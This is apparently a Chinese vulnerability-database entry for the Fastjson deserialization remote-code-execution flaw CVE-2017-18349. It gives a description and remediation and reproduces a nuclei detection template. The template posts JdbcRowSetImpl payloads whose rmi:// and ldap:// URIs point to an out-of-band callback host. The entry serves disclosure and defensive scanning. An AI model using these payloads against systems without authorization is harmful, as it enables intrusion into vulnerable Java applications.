Fastjson 反序列化远程代码执行漏洞

漏洞信息

漏洞名称： Fastjson 反序列化远程代码执行漏洞

漏洞编号：

• CVE： CVE-2017-18349

漏洞类型： 反序列化

漏洞等级： 严重

漏洞描述： Fastjson是阿里巴巴开源的一个高性能JSON处理库，广泛用于Java应用中的JSON序列化和反序列化操作。由于其高效和易用性，Fastjson在众多Java应用中被采用，包括Web应用、微服务架构等。

该漏洞存在于Fastjson 1.2.25之前的版本中，具体为parseObject函数在处理恶意构造的JSON请求时存在反序列化漏洞。攻击者可以通过构造特定的JSON数据，利用dataSourceName字段中的rmi://或ldap:// URI，触发远程代码执行。这一漏洞的技术根源在于Fastjson在反序列化过程中未充分验证输入数据的合法性，导致攻击者可以注入恶意代码。

成功利用此漏洞的攻击者可以在目标系统上执行任意代码，完全控制系统，访问敏感数据，甚至建立持久化的后门。由于该漏洞不需要任何形式的认证即可被利用，且攻击过程可以自动化，因此对使用受影响版本Fastjson的系统构成了极高的安全风险。企业应立即升级Fastjson至1.2.25或更高版本，并采取其他缓解措施，如禁用autotype功能，实施严格的@type注解白名单过滤，以及使用WAF来过滤恶意请求。

产品厂商： alibaba

产品名称： fastjson

影响版本： version < 1.2.25

来源： https://github.com/projectdiscovery/nuclei-templates/blob/5f98107f9d8b99430903e73793861a9ba3beaf2c/http%2Fcves%2F2017%2FCVE-2017-18349.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2017-18349

info:
  name: Fastjson Insecure Deserialization - Remote Code Execution
  author: night
  severity: critical
  description: |
    parseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request, as demonstrated by a crafted rmi-// URI in the dataSourceName field of HTTP POST data to the Pippo /json URI, which is mishandled in AjaxApplication.java.
  impact: |
    Successful exploitation allows complete system compromise through remote code execution, enabling attackers to execute arbitrary commands, access sensitive data, and establish persistent backdoors on the target system.
  remediation: |
    Update Fastjson to version 1.2.25 or later which includes security patches for this vulnerability.Disable autotype functionality by setting `fastjson.parser.autoTypeSupport=false`.Implement strict whitelist filtering for `@type` annotations, validate and sanitize all JSON input.Use Web Application Firewalls (WAF) to filter malicious requests, and regularly audit dependencies for known vulnerabilities. Consider migrating to safer JSON parsing libraries like Jackson with secure configurations.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2017-18349
    - https://github.com/alibaba/fastjson/wiki/security_update_20170315
    - https://github.com/pippo-java/pippo/issues/466
    - https://github.com/h0cksr/Fastjson--CVE-2017-18349-
    - https://fortiguard.com/encyclopedia/ips/44059
    - https://www.exploit-db.com/exploits/45983
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-18349
    cwe-id: CWE-20
    epss-score: 0.7075
    epss-percentile: 0.98594
    cpe: cpe:2.3:a:alibaba:fastjson:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: alibaba
    product: fastjson
  tags: cve,cve2017,fastjson,deserialization,rce,oob,oast

variables:
  rmi_payload: "rmi://{{interactsh-url}}/{{randstr}}"
  ldap_payload: "ldap://{{interactsh-url}}/{{randstr}}"

http:
  - method: POST
    path:
      - "{{BaseURL}}/json"
      - "{{BaseURL}}/api/json"

    headers:
      Content-Type: application/json
      Accept: application/json

    body: |
      {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "{{rmi_payload}}",
        "autoCommit": true
      }

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol,'dns')"
          - "contains(content_type, 'application/json')"
          - "contains_all(body, 'autoCommit','set property error')"
        condition: and

    extractors:
      - type: kval
        kval:
          - interactsh_ip

  - method: POST
    path:
      - "{{BaseURL}}/json"
      - "{{BaseURL}}/api/json"
      - "{{BaseURL}}/parse"
      - "{{BaseURL}}/deserialize"

    headers:
      Content-Type: application/json
      Accept: application/json

    body: |
      {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "{{ldap_payload}}",
        "autoCommit": true
      }

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol,'dns')"
          - "contains(content_type, 'application/json')"
          - "contains_all(body, 'autoCommit','set property error')"
        condition: and

    extractors:
      - type: kval
        kval:
          - interactsh_ip

  - method: POST
    path:
      - "{{BaseURL}}/json"
      - "{{BaseURL}}/api/json"
      - "{{BaseURL}}/parse"
      - "{{BaseURL}}/deserialize"

    headers:
      Content-Type: application/json
      Accept: application/json

    body: |
      {
        "data": {
          "@type": "com.sun.rowset.JdbcRowSetImpl",
          "dataSourceName": "{{rmi_payload}}",
          "autoCommit": true
        }
      }

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol,'dns')"
          - "contains(content_type, 'application/json')"
          - "contains_all(body, 'autoCommit','set property error')"
        condition: and

    extractors:
      - type: kval
        kval:
          - interactsh_ip

  - method: POST
    path:
      - "{{BaseURL}}/json"

    headers:
      Content-Type: application/json
      Accept: application/json

    body: |
      {
        "b": {
          "@type": "com.sun.rowset.JdbcRowSetImpl",
          "dataSourceName": "{{ldap_payload}}",
          "autoCommit": true
        }
      }

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol,'dns')"
          - "contains(content_type, 'application/json')"
          - "contains_all(body, 'autoCommit','set property error')"
        condition: and

    extractors:
      - type: kval
        kval:
          - interactsh_ip